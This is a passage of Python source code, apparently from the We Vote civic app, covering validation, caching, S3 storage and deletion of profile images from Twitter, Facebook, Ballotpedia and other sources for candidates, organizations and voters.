'image_stored_to_aws': image_stored_to_aws,
}
return error_results
we_vote_image_created = True
we_vote_image = create_we_vote_image_results['we_vote_image']
# Image url validation and get source image properties
analyze_source_images_results = analyze_source_images(
twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name,
facebook_user_id=facebook_user_id,
maplight_id=maplight_id,
vote_smart_id=vote_smart_id,
image_url_https=image_url_https,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
other_source=other_source)
if 'analyze_image_url_results' not in analyze_source_images_results or \
'image_url_valid' not in analyze_source_images_results['analyze_image_url_results'] or not \
analyze_source_images_results['analyze_image_url_results']['image_url_valid']:
error_results = {
'success': success,
'status': status + " IMAGE_URL_NOT_VALID",
'we_vote_image_created': True,
'image_url_valid': False,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_url_valid = True
status += " IMAGE_URL_VALID"
# Get today's cached images and their versions so that image version can be calculated
cached_todays_we_vote_image_list_results = we_vote_image_manager.retrieve_todays_cached_we_vote_image_list(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original)
for cached_we_vote_image in cached_todays_we_vote_image_list_results['we_vote_image_list']:
if cached_we_vote_image.same_day_image_version:
image_versions.append(cached_we_vote_image.same_day_image_version)
if image_versions:
same_day_image_version = max(image_versions) + 1
else:
same_day_image_version = 1
if kind_of_image_facebook_profile or kind_of_image_facebook_background:
# image url is valid so store source image of facebook to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_facebook_info(
we_vote_image, facebook_user_id, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_facebook_profile,
kind_of_image_facebook_background, image_url_valid)
elif kind_of_image_twitter_profile or kind_of_image_twitter_background or kind_of_image_twitter_banner:
# image url is valid so store source image of twitter to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_twitter_info(
we_vote_image, twitter_id, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_twitter_profile,
kind_of_image_twitter_background, kind_of_image_twitter_banner, image_url_valid)
elif kind_of_image_maplight:
save_source_info_results = we_vote_image_manager.save_we_vote_image_maplight_info(
we_vote_image, maplight_id, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_maplight, image_url_valid)
elif kind_of_image_vote_smart:
save_source_info_results = we_vote_image_manager.save_we_vote_image_vote_smart_info(
we_vote_image, vote_smart_id, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_vote_smart, image_url_valid)
elif kind_of_image_ballotpedia_profile:
save_source_info_results = we_vote_image_manager.save_we_vote_image_ballotpedia_info(
we_vote_image, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_ballotpedia_profile, image_url_valid)
elif kind_of_image_linkedin_profile:
save_source_info_results = we_vote_image_manager.save_we_vote_image_linkedin_info(
we_vote_image, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_linkedin_profile, image_url_valid)
elif kind_of_image_wikipedia_profile:
save_source_info_results = we_vote_image_manager.save_we_vote_image_wikipedia_info(
we_vote_image, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'],
image_url_https, same_day_image_version, kind_of_image_wikipedia_profile, image_url_valid)
elif kind_of_image_other_source:
save_source_info_results = we_vote_image_manager.save_we_vote_image_other_source_info(
we_vote_image, analyze_source_images_results['analyze_image_url_results']['image_width'],
analyze_source_images_results['analyze_image_url_results']['image_height'], other_source,
image_url_https, same_day_image_version, kind_of_image_other_source, image_url_valid)
status += " " + save_source_info_results['status']
if save_source_info_results['success']:
image_stored_from_source = True
date_image_saved = "{year}{:02d}{:02d}".format(we_vote_image.date_image_saved.month,
we_vote_image.date_image_saved.day,
year=we_vote_image.date_image_saved.year)
# ex twitter_profile_image_master-2017210_1_48x48.png
analyze_image_url_results = analyze_source_images_results['analyze_image_url_results']
image_width = analyze_image_url_results['image_width'] if 'image_width' in analyze_image_url_results else 0
image_height = analyze_image_url_results['image_height'] if 'image_height' in analyze_image_url_results else 0
image_format = analyze_image_url_results['image_format'] if 'image_format' in analyze_image_url_results else ''
we_vote_image_file_name = \
"{image_type}_{master_image}-{date_image_saved}_{counter}_" \
"{image_width}x{image_height}.{image_format}" \
"".format(
image_type=analyze_source_images_results['image_type'],
master_image=MASTER_IMAGE,
date_image_saved=date_image_saved,
counter=str(same_day_image_version),
image_width=str(image_width),
image_height=str(image_height),
image_format=str(image_format))
if voter_we_vote_id:
we_vote_image_file_location = voter_we_vote_id + "/" + we_vote_image_file_name
elif candidate_we_vote_id:
we_vote_image_file_location = candidate_we_vote_id + "/" + we_vote_image_file_name
elif organization_we_vote_id:
we_vote_image_file_location = organization_we_vote_id + "/" + we_vote_image_file_name
else:
we_vote_image_file_location = we_vote_image_file_name
image_stored_locally = we_vote_image_manager.store_image_locally(
analyze_source_images_results['image_url_https'], we_vote_image_file_name)
if not image_stored_locally:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_LOCALLY ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': False,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
status += " IMAGE_STORED_LOCALLY "
image_stored_to_aws = we_vote_image_manager.store_image_to_aws(
we_vote_image_file_name, we_vote_image_file_location,
analyze_source_images_results['analyze_image_url_results']['image_format'])
if not image_stored_to_aws:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_TO_AWS ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': False,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
we_vote_image_url = "https://{bucket_name}.s3.amazonaws.com/{we_vote_image_file_location}" \
"".format(bucket_name=AWS_STORAGE_BUCKET_NAME,
we_vote_image_file_location=we_vote_image_file_location)
save_aws_info = we_vote_image_manager.save_we_vote_image_aws_info(we_vote_image, we_vote_image_url,
we_vote_image_file_location,
we_vote_parent_image_id, is_active_version)
status += " IMAGE_STORED_TO_AWS " + save_aws_info['status'] + " "
success = save_aws_info['success']
if not success:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
else:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': False,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'image_stored_to_aws': image_stored_to_aws,
}
return results
def retrieve_facebook_image_url(facebook_user_id):
"""
Retrieve facebook profile url from Facebook and background url from FacebookUser table.
:param facebook_user_id:
:return:
"""
results = {
'facebook_profile_image_url': None,
'facebook_background_image_url': None
}
facebook_manager = FacebookManager()
get_url = "https://graph.facebook.com/v3.1/{facebook_user_id}/picture?width=200&height=200"\
.format(facebook_user_id=facebook_user_id)
response = requests.get(get_url)
if response.status_code == HTTP_OK:
# new facebook profile image url found
results['facebook_profile_image_url'] = response.url
facebook_user_results = facebook_manager.retrieve_facebook_user_by_facebook_user_id(facebook_user_id)
if facebook_user_results['facebook_user_found']:
results['facebook_background_image_url'] = \
facebook_user_results['facebook_user'].facebook_background_image_url_https
return results
def retrieve_and_save_ballotpedia_candidate_images(candidate):
from import_export_ballotpedia.controllers import retrieve_ballotpedia_candidate_image_from_api
status = ""
candidate_manager = CandidateManager()
politician_manager = PoliticianManager()
if not candidate:
status += "BALLOTPEDIA_CANDIDATE_IMAGE_NOT_RETRIEVED-CANDIDATE_MISSING "
results = {
'success': False,
'status': status,
'candidate': None,
}
return results
if positive_value_exists(candidate.ballotpedia_image_id):
status += "BALLOTPEDIA_CANDIDATE_IMAGE-REACHING_OUT_TO_BALLOTPEDIA "
results = retrieve_ballotpedia_candidate_image_from_api(
candidate.ballotpedia_image_id, candidate.google_civic_election_id)
if results['success']:
status += "BALLOTPEDIA_CANDIDATE_IMAGE_RETRIEVED "
# Get original image url for cache original size image
ballotpedia_profile_image_url_https = results['profile_image_url_https']
cache_results = cache_master_and_resized_image(
candidate_id=candidate.id,
candidate_we_vote_id=candidate.we_vote_id,
ballotpedia_profile_image_url=ballotpedia_profile_image_url_https,
image_source=BALLOTPEDIA_IMAGE_SOURCE)
cached_ballotpedia_image_url_https = cache_results['cached_ballotpedia_image_url_https']
we_vote_hosted_profile_image_url_large = cache_results['we_vote_hosted_profile_image_url_large']
we_vote_hosted_profile_image_url_medium = cache_results['we_vote_hosted_profile_image_url_medium']
we_vote_hosted_profile_image_url_tiny = cache_results['we_vote_hosted_profile_image_url_tiny']
save_candidate_results = candidate_manager.update_candidate_ballotpedia_image_details(
candidate,
cached_ballotpedia_image_url_https,
we_vote_hosted_profile_image_url_large,
we_vote_hosted_profile_image_url_medium,
we_vote_hosted_profile_image_url_tiny)
candidate = save_candidate_results['candidate']
# Need to update voter ballotpedia details for the candidate in future
save_politician_details_results = politician_manager.update_politician_details_from_candidate(
candidate)
save_position_from_candidate_results = update_all_position_details_from_candidate(candidate)
else:
status += "BALLOTPEDIA_CANDIDATE_IMAGE-CLEARING_DETAILS "
# save_candidate_results = candidate_manager.clear_candidate_twitter_details(
# candidate)
results = {
'success': True,
'status': status,
'candidate': candidate,
}
return results
def retrieve_twitter_image_url(twitter_id, kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False):
"""
Retrieve twitter image urls from TwitterUser table.
:param twitter_id:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:return:
"""
twitter_image_url = None
twitter_user_manager = TwitterUserManager()
twitter_user_results = twitter_user_manager.retrieve_twitter_user(twitter_id)
if twitter_user_results['twitter_user_found']:
if kind_of_image_twitter_profile:
twitter_image_url = twitter_user_results['twitter_user'].twitter_profile_image_url_https
elif kind_of_image_twitter_background:
twitter_image_url = twitter_user_results['twitter_user'].twitter_profile_background_image_url_https
elif kind_of_image_twitter_banner:
twitter_image_url = twitter_user_results['twitter_user'].twitter_profile_banner_url_https
return twitter_user_results['twitter_user'], twitter_image_url
def retrieve_image_urls_from_twitter(twitter_id):
"""
Retrieve latest twitter profile, background and banner image url from twitter API call
:param twitter_id:
:return:
"""
latest_twitter_profile_image_url = None
latest_twitter_background_image_url = None
latest_twitter_banner_image_url = None
twitter_user_info_results = retrieve_twitter_user_info(twitter_id, twitter_handle='')
if 'profile_image_url_https' in twitter_user_info_results['twitter_json'] \
and twitter_user_info_results['twitter_json']['profile_image_url_https']:
# new twitter image url found
latest_twitter_profile_image_url = twitter_user_info_results['twitter_json'][
'profile_image_url_https']
if 'profile_background_image_url_https' in twitter_user_info_results['twitter_json'] \
and twitter_user_info_results['twitter_json']['profile_background_image_url_https']:
# new twitter image url found
latest_twitter_background_image_url = twitter_user_info_results['twitter_json'][
'profile_background_image_url_https']
if 'profile_banner_url' in twitter_user_info_results['twitter_json'] \
and twitter_user_info_results['twitter_json']['profile_banner_url']:
# new twitter image url found
latest_twitter_banner_image_url = twitter_user_info_results['twitter_json'][
'profile_banner_url']
results = {
'latest_twitter_profile_image_url': latest_twitter_profile_image_url,
'latest_twitter_background_image_url': latest_twitter_background_image_url,
'latest_twitter_banner_image_url': latest_twitter_banner_image_url,
}
return results
def analyze_source_images(
twitter_id=0,
twitter_screen_name='',
facebook_user_id=0,
maplight_id=0,
vote_smart_id=0,
image_url_https="",
kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False,
kind_of_image_facebook_profile=False,
kind_of_image_facebook_background=False,
kind_of_image_maplight=False,
kind_of_image_vote_smart=False,
kind_of_image_ballotpedia_profile=False,
kind_of_image_campaignx_photo=False,
kind_of_image_linkedin_profile=False,
kind_of_image_wikipedia_profile=False,
kind_of_image_other_source=False,
other_source=False):
"""
:param twitter_id:
:param twitter_screen_name:
:param facebook_user_id:
:param maplight_id:
:param vote_smart_id:
:param image_url_https:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:param kind_of_image_facebook_profile:
:param kind_of_image_facebook_background:
:param kind_of_image_maplight:
:param kind_of_image_vote_smart:
:param kind_of_image_ballotpedia_profile:
:param kind_of_image_campaignx_photo:
:param kind_of_image_linkedin_profile:
:param kind_of_image_wikipedia_profile:
:param kind_of_image_other_source:
:param other_source:
:return:
"""
image_type = None
if kind_of_image_twitter_profile:
image_type = TWITTER_PROFILE_IMAGE_NAME
elif kind_of_image_twitter_background:
image_type = TWITTER_BACKGROUND_IMAGE_NAME
elif kind_of_image_twitter_banner:
image_type = TWITTER_BANNER_IMAGE_NAME
elif kind_of_image_facebook_profile:
image_type = FACEBOOK_PROFILE_IMAGE_NAME
elif kind_of_image_facebook_background:
image_type = FACEBOOK_BACKGROUND_IMAGE_NAME
elif kind_of_image_maplight:
image_type = MAPLIGHT_IMAGE_NAME
elif kind_of_image_vote_smart:
image_type = VOTE_SMART_IMAGE_NAME
elif kind_of_image_ballotpedia_profile:
image_type = BALLOTPEDIA_IMAGE_NAME
elif kind_of_image_campaignx_photo:
image_type = CAMPAIGNX_PHOTO_IMAGE_NAME
elif kind_of_image_linkedin_profile:
image_type = LINKEDIN_IMAGE_NAME
elif kind_of_image_wikipedia_profile:
image_type = WIKIPEDIA_IMAGE_NAME
elif kind_of_image_other_source:
image_type = other_source
analyze_image_url_results = analyze_remote_url(image_url_https)
results = {
'twitter_id': twitter_id,
'twitter_screen_name': twitter_screen_name,
'facebook_user_id': facebook_user_id,
'maplight_id': maplight_id,
'vote_smart_id': vote_smart_id,
'image_url_https': image_url_https,
'image_type': image_type,
'analyze_image_url_results': analyze_image_url_results
}
return results
def create_resized_images_for_all_organizations():
"""
Create resized images for all organizations
:return:
"""
create_all_resized_images_results = []
we_vote_image_list = WeVoteImage.objects.all()
# TODO Limit this to organizations only
for we_vote_image in we_vote_image_list:
# Iterate through all cached images
create_resized_images_results = create_resized_image_if_not_created(we_vote_image)
create_all_resized_images_results.append(create_resized_images_results)
return create_all_resized_images_results
def create_resized_images_for_all_voters():
"""
Create resized images for all voters
:return:
"""
create_all_resized_images_results = []
we_vote_image_list = WeVoteImage.objects.all()
# TODO Limit this to voters only
for we_vote_image in we_vote_image_list:
# Iterate through all cached images
create_resized_images_results = create_resized_image_if_not_created(we_vote_image)
create_all_resized_images_results.append(create_resized_images_results)
return create_all_resized_images_results
def delete_cached_images_for_candidate(candidate):
original_twitter_profile_image_url_https = None
original_twitter_profile_background_image_url_https = None
original_twitter_profile_banner_url_https = None
delete_image_count = 0
not_deleted_image_count = 0
we_vote_image_list = retrieve_all_images_for_one_candidate(candidate.we_vote_id)
if len(we_vote_image_list) > 0:
we_vote_image_manager = WeVoteImageManager()
for we_vote_image in we_vote_image_list:
if we_vote_image.kind_of_image_twitter_profile and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_image_url_https = we_vote_image.twitter_profile_image_url_https
if we_vote_image.kind_of_image_twitter_background and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_background_image_url_https = \
we_vote_image.twitter_profile_background_image_url_https
if we_vote_image.kind_of_image_twitter_banner and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_banner_url_https = we_vote_image.twitter_profile_banner_url_https
# Reset CandidateCampaign with original image details
candidate_manager = CandidateManager()
reset_candidate_image_results = candidate_manager.reset_candidate_image_details(
candidate, original_twitter_profile_image_url_https, original_twitter_profile_background_image_url_https,
original_twitter_profile_banner_url_https)
# Reset Twitter User Table with original image details
twitter_user_manager = TwitterUserManager()
reset_twitter_user_image_results = twitter_user_manager.reset_twitter_user_image_details(
candidate.twitter_user_id, original_twitter_profile_image_url_https,
original_twitter_profile_background_image_url_https, original_twitter_profile_banner_url_https)
# Reset Position Table with original image details
reset_position_image_results = reset_all_position_image_details_from_candidate(
candidate, original_twitter_profile_image_url_https)
# Reset Politician Table with original image details
politician_manager = PoliticianManager()
reset_politician_image_results = politician_manager.reset_politician_image_details_from_candidate(
candidate, original_twitter_profile_image_url_https, original_twitter_profile_background_image_url_https,
original_twitter_profile_banner_url_https)
if reset_candidate_image_results['success']:
for we_vote_image in we_vote_image_list:
# Delete image from AWS
image_deleted_from_aws = we_vote_image_manager.delete_image_from_aws(
we_vote_image.we_vote_image_file_location)
delete_result = we_vote_image_manager.delete_we_vote_image(we_vote_image)
if delete_result['success']:
delete_image_count += 1
else:
not_deleted_image_count += 1
success = True
status = "DELETED_CACHED_IMAGES_FOR_CANDIDATE"
else:
success = False
status = "NO_IMAGE_FOUND_FOR_CANDIDATE"
results = {
'success': success,
'status': status,
'delete_image_count': delete_image_count,
'not_deleted_image_count': not_deleted_image_count,
}
return results
def delete_cached_images_for_issue(issue):
delete_image_count = 0
not_deleted_image_count = 0
we_vote_image_list = retrieve_all_images_for_one_issue(issue.we_vote_id)
if len(we_vote_image_list) > 0:
we_vote_image_manager = WeVoteImageManager()
# Reset Issue with original image details
issue_manager = IssueManager()
reset_candidate_image_results = issue_manager.reset_issue_image_details(
issue, issue_image_url='')
if reset_candidate_image_results['success']:
for we_vote_image in we_vote_image_list:
# Delete image from AWS
image_deleted_from_aws = we_vote_image_manager.delete_image_from_aws(
we_vote_image.we_vote_image_file_location)
delete_result = we_vote_image_manager.delete_we_vote_image(we_vote_image)
if delete_result['success']:
delete_image_count += 1
else:
not_deleted_image_count += 1
success = True
status = "DELETED_CACHED_IMAGES_FOR_ISSUE"
else:
success = False
status = "NO_IMAGE_FOUND_FOR_ISSUE"
results = {
'success': success,
'status': status,
'delete_image_count': delete_image_count,
'not_deleted_image_count': not_deleted_image_count,
}
return results
def delete_cached_images_for_organization(organization):
original_twitter_profile_image_url_https = None
original_twitter_profile_background_image_url_https = None
original_twitter_profile_banner_url_https = None
original_facebook_profile_image_url_https = None
original_facebook_background_image_url_https = None
delete_image_count = 0
not_deleted_image_count = 0
we_vote_image_list = retrieve_all_images_for_one_organization(organization.we_vote_id)
if len(we_vote_image_list) > 0:
we_vote_image_manager = WeVoteImageManager()
for we_vote_image in we_vote_image_list:
if we_vote_image.kind_of_image_twitter_profile and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_image_url_https = we_vote_image.twitter_profile_image_url_https
if we_vote_image.kind_of_image_twitter_background and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_background_image_url_https = \
we_vote_image.twitter_profile_background_image_url_https
if we_vote_image.kind_of_image_twitter_banner and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_banner_url_https = we_vote_image.twitter_profile_banner_url_https
if we_vote_image.kind_of_image_facebook_profile and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_facebook_profile_image_url_https = we_vote_image.facebook_profile_image_url_https
if we_vote_image.kind_of_image_facebook_background and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_facebook_background_image_url_https = we_vote_image.facebook_background_image_url_https
# Reset Organization with original image details
organization_manager = OrganizationManager()
reset_organization_image_results = organization_manager.reset_organization_image_details(
organization, original_twitter_profile_image_url_https, original_twitter_profile_background_image_url_https,
original_twitter_profile_banner_url_https, original_facebook_profile_image_url_https)
# Reset Twitter User Table with original image details
twitter_user_manager = TwitterUserManager()
reset_twitter_user_image_results = twitter_user_manager.reset_twitter_user_image_details(
organization.twitter_user_id, original_twitter_profile_image_url_https,
original_twitter_profile_background_image_url_https, original_twitter_profile_banner_url_https)
# Reset Position Table with original image details
reset_position_image_results = reset_position_entered_image_details_from_organization(
organization, original_twitter_profile_image_url_https, original_facebook_profile_image_url_https)
# Reset Voter Guide table with original image details
voter_guide_manager = VoterGuideManager()
reset_voter_guide_image_results = voter_guide_manager.reset_voter_guide_image_details(
organization, original_twitter_profile_image_url_https, original_facebook_profile_image_url_https)
# Reset Voter with original image details
voter_manager = VoterManager()
voter_results = voter_manager.retrieve_voter_by_organization_we_vote_id(organization.we_vote_id)
voter = voter_results['voter']
if voter_results['voter_found']:
reset_voter_image_results = voter_manager.reset_voter_image_details(
voter, original_twitter_profile_image_url_https, original_facebook_profile_image_url_https)
# Reset Facebook User Table with original image details
facebook_manager = FacebookManager()
reset_facebook_user_image_results = facebook_manager.reset_facebook_user_image_details(
organization.facebook_id, original_facebook_profile_image_url_https,
original_facebook_background_image_url_https)
if reset_organization_image_results['success']:
for we_vote_image in we_vote_image_list:
# Delete image from AWS
image_deleted_from_aws = we_vote_image_manager.delete_image_from_aws(
we_vote_image.we_vote_image_file_location)
delete_result = we_vote_image_manager.delete_we_vote_image(we_vote_image)
if delete_result['success']:
delete_image_count += 1
else:
not_deleted_image_count += 1
success = True
status = "DELETED_CACHED_IMAGES_FOR_CANDIDATE"
else:
success = False
status = "NO_IMAGE_FOUND_FOR_CANDIDATE"
results = {
'success': success,
'status': status,
'delete_image_count': delete_image_count,
'not_deleted_image_count': not_deleted_image_count,
}
return results
def delete_cached_images_for_voter(voter):
original_twitter_profile_image_url_https = None
original_twitter_profile_background_image_url_https = None
original_twitter_profile_banner_url_https = None
original_facebook_profile_image_url_https = None
original_facebook_background_image_url_https = None
delete_image_count = 0
not_deleted_image_count = 0
we_vote_image_list = retrieve_all_images_for_one_voter(voter.id)
if len(we_vote_image_list) > 0:
we_vote_image_manager = WeVoteImageManager()
for we_vote_image in we_vote_image_list:
if we_vote_image.kind_of_image_twitter_profile and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_image_url_https = we_vote_image.twitter_profile_image_url_https
if we_vote_image.kind_of_image_twitter_background and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_background_image_url_https = \
we_vote_image.twitter_profile_background_image_url_https
if we_vote_image.kind_of_image_twitter_banner and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_banner_url_https = we_vote_image.twitter_profile_banner_url_https
if we_vote_image.kind_of_image_facebook_profile and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_facebook_profile_image_url_https = we_vote_image.facebook_profile_image_url_https
if we_vote_image.kind_of_image_facebook_background and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_facebook_background_image_url_https = we_vote_image.facebook_background_image_url_https
# Reset Voter with original image details
voter_manager = VoterManager()
reset_voter_image_results = voter_manager.reset_voter_image_details(
voter, original_twitter_profile_image_url_https, original_facebook_profile_image_url_https)
# Reset Twitter User Table with original image details
twitter_user_manager = TwitterUserManager()
reset_twitter_user_image_results = twitter_user_manager.reset_twitter_user_image_details(
voter.twitter_id, original_twitter_profile_image_url_https,
original_twitter_profile_background_image_url_https, original_twitter_profile_banner_url_https)
# Reset Organization with original image details
organization_manager = OrganizationManager()
organization_results = organization_manager.retrieve_organization(0, '', '', voter.twitter_id)
organization = organization_results['organization']
if organization_results['organization_found']:
reset_organization_image_results = organization_manager.reset_organization_image_details(
organization, original_twitter_profile_image_url_https,
original_twitter_profile_background_image_url_https, original_twitter_profile_banner_url_https,
original_facebook_profile_image_url_https)
# Reset Position Table with original image details
reset_position_image_results = reset_position_for_friends_image_details_from_voter(
voter, original_twitter_profile_image_url_https, original_facebook_profile_image_url_https)
# Reset Facebook User Table with original image details
facebook_manager = FacebookManager()
reset_facebook_user_image_results = facebook_manager.reset_facebook_user_image_details(
voter.facebook_id, original_facebook_profile_image_url_https, original_facebook_background_image_url_https)
if reset_voter_image_results['success']:
for we_vote_image in we_vote_image_list:
# Delete image from AWS
image_deleted_from_aws = we_vote_image_manager.delete_image_from_aws(
we_vote_image.we_vote_image_file_location)
delete_result = we_vote_image_manager.delete_we_vote_image(we_vote_image)
if delete_result['success']:
delete_image_count += 1
else:
not_deleted_image_count += 1
success = True
status = "DELETED_CACHED_IMAGES_FOR_VOTER"
else:
success = False
status = "NO_IMAGE_FOUND_FOR_VOTER"
results = {
'success': success,
'status': status,
'delete_image_count': delete_image_count,
'not_deleted_image_count': not_deleted_image_count,
}
return results
def delete_stored_images_for_voter(voter):
"""
This method actually removes all image data from the Voter, Facebook, and Twitter tables for this voter
Call delete_cached_images_for_voter() before calling this one, to remove all the cached images from AWS, otherwise
the cached images will stay in AWS as unreferenced wasted storage
"""
success = False
# Delete Voter images
voter_manager = VoterManager()
voter_results = voter_manager.retrieve_voter_by_we_vote_id(voter.we_vote_id)
voter = voter_results['voter']
if voter_results['voter_found']:
voter.twitter_profile_image_url_https = ''
voter.we_vote_hosted_profile_image_url_large = ''
voter.we_vote_hosted_profile_image_url_medium = ''
voter.we_vote_hosted_profile_image_url_tiny = ''
voter.facebook_profile_image_url_https = ''
voter.save()
success = True
# Delete Twitter User Table images
if positive_value_exists(voter.twitter_id):
twitter_user_manager = TwitterUserManager()
twitter_results = twitter_user_manager.retrieve_twitter_user(voter.twitter_id)
twitter_user_found = twitter_results['twitter_user_found']
twitter_user = twitter_results['twitter_user']
if twitter_user_found:
twitter_user.twitter_profile_image_url_https = ''
twitter_user.twitter_profile_background_image_url_https = ''
twitter_user.twitter_profile_banner_url_https = ''
twitter_user.we_vote_hosted_profile_image_url_large = ''
twitter_user.we_vote_hosted_profile_image_url_medium = ''
twitter_user.we_vote_hosted_profile_image_url_tiny = ''
twitter_user.save()
success = True
# Delete Organization images, Dec 2019, not for now, don't want to cause exceptions
# Delete Position Table images, Dec 2019, not for now, don't want to cause exceptions
# Delete Facebook User Table images
if positive_value_exists(voter.facebook_id):
facebook_manager = FacebookManager()
facebook_user_results = facebook_manager.retrieve_facebook_user_by_facebook_user_id(voter.facebook_id)
facebook_user = facebook_user_results['facebook_user']
if facebook_user_results['facebook_user_found']:
facebook_user.facebook_profile_image_url_https = ''
facebook_user.facebook_background_image_url_https = ''
facebook_user.we_vote_hosted_profile_image_url_large = ''
facebook_user.we_vote_hosted_profile_image_url_medium = ''
facebook_user.we_vote_hosted_profile_image_url_tiny = ''
facebook_user.save()
success = True
# Delete FacebookAuthResponse Table images, Dec 2019, not for now, as a result image will display when voter signsin
# Delete TwitterAuthResponse Table images, Dec 2019, not for now, as a result image will display when voter signs in
if success:
status = "DELETED_STORED_IMAGES_FOR_VOTER"
else:
status = "NO_IMAGE_FOUND_FOR_VOTER"
results = {
'success': success,
'status': status,
}
return results
def retrieve_all_images_for_one_candidate(candidate_we_vote_id):
"""
Retrieve all cached images for one candidate
:param candidate_we_vote_id:
:return:
"""
we_vote_image_list = []
candidate_manager = CandidateManager()
we_vote_image_manager = WeVoteImageManager()
if positive_value_exists(candidate_we_vote_id):
# if candidate_we_vote_id is defined then retrieve cached images for that candidate only
candidate_results = candidate_manager.retrieve_candidate_from_we_vote_id(candidate_we_vote_id)
if candidate_results['candidate_found']:
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(None, candidate_we_vote_id)
we_vote_image_list_query = we_vote_image_list_results['we_vote_image_list']
we_vote_image_list = list(we_vote_image_list_query)
return we_vote_image_list
def retrieve_all_images_for_one_organization(organization_we_vote_id):
"""
Retrieve all cached images for one organization
:param organization_we_vote_id:
:return:
"""
we_vote_image_list = []
